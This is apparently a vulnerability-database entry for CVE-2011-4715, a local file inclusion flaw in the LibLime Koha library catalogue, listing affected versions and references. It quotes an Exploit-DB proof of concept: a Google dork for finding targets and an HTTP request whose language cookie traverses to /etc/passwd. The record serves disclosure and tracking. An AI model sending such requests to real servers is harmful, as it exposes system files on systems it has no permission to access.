Details of VAR-E-201111-0363

ID

VAR-E-201111-0363

CVE

cve_id:

CVE-2011-4715

Trust: 1.9

sources: BID: 50812 // EXPLOIT-DB: 18153 // EDBNET: 40617

EDB ID

18153

TITLE

LibLime Koha 4.2 - Local File Inclusion - CGI webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 18153

DESCRIPTION

LibLime Koha 4.2 - Local File Inclusion. CVE-77322CVE-2011-4715 . webapps exploit for CGI platform

Trust: 0.6

sources: EXPLOIT-DB: 18153

AFFECTED PRODUCTS

vendor:	liblime	model:	koha	scope:	eq	version:	4.2	Trust: 1.0
vendor:	liblime	model:	koha	scope:	lte	version:	<=4.2	Trust: 0.6
vendor:	koha	model:	library software community koha	scope:	eq	version:	3.6	Trust: 0.3
vendor:	koha	model:	library software community koha	scope:	eq	version:	3.4.6	Trust: 0.3
vendor:	koha	model:	library software community koha	scope:	eq	version:	3.4.2	Trust: 0.3
vendor:	koha	model:	library software community koha	scope:	eq	version:	3.4.1	Trust: 0.3
vendor:	koha	model:	library software community koha	scope:	ne	version:	3.6.1	Trust: 0.3
vendor:	koha	model:	library software community koha	scope:	ne	version:	3.4.7	Trust: 0.3

sources: BID: 50812 // EXPLOIT-DB: 18153 // EDBNET: 40617

EXPLOIT

# Exploit Title: [Koha Opac Local File Inclusion]
# Google Dork: [inurl:koha/opac-main.pl]
# Date: [17.11.2011]
# Author: [Akin Tosunlar(Vigasis Labs)]
# Software Link: [www.koha.org]
# Version: [<4.2]
# Tested on: [Linux(Apache 2.2.14)]
# CVE : []

# Vigasis Pentest Team (www.vigasis.com)
# 0-Day Exploit
# Akin Tosunlar
# Special Thanks to Ozgur Yurdusev

#Exploit

GET /cgi-bin/koha/opac-main.pl HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Cookie: sessionID=1;KohaOpacLanguage=../../../../../../../../etc/passwd%00
Connection: Close
Pragma: no-cache
Host: localhost

Trust: 1.0

sources: EXPLOIT-DB: 18153

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 18153

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 18153

TYPE

Local File Inclusion

Trust: 1.0

sources: EXPLOIT-DB: 18153

CREDITS

Akin Tosunlar

Trust: 0.6

sources: EXPLOIT-DB: 18153

EXTERNAL IDS

db:	NVD	id:	CVE-2011-4715	Trust: 1.9
db:	EXPLOIT-DB	id:	18153	Trust: 1.6
db:	EDBNET	id:	40617	Trust: 0.6
db:	BID	id:	50812	Trust: 0.3

sources: BID: 50812 // EXPLOIT-DB: 18153 // EDBNET: 40617

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2011-4715	Trust: 1.6
url:	https://www.exploit-db.com/exploits/18153/	Trust: 0.6
url:	http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=6629	Trust: 0.3
url:	http://koha-community.org/	Trust: 0.3

sources: BID: 50812 // EXPLOIT-DB: 18153 // EDBNET: 40617

SOURCES

db:	BID	id:	50812
db:	EXPLOIT-DB	id:	18153
db:	EDBNET	id:	40617

LAST UPDATE DATE

2022-07-27T09:54:38.271000+00:00

SOURCES UPDATE DATE

db:

BID

id:

50812

date:

2011-12-20T21:59:00

SOURCES RELEASE DATE

db:	BID	id:	50812	date:	2011-11-24T00:00:00
db:	EXPLOIT-DB	id:	18153	date:	2011-11-24T00:00:00
db:	EDBNET	id:	40617	date:	2011-11-24T00:00:00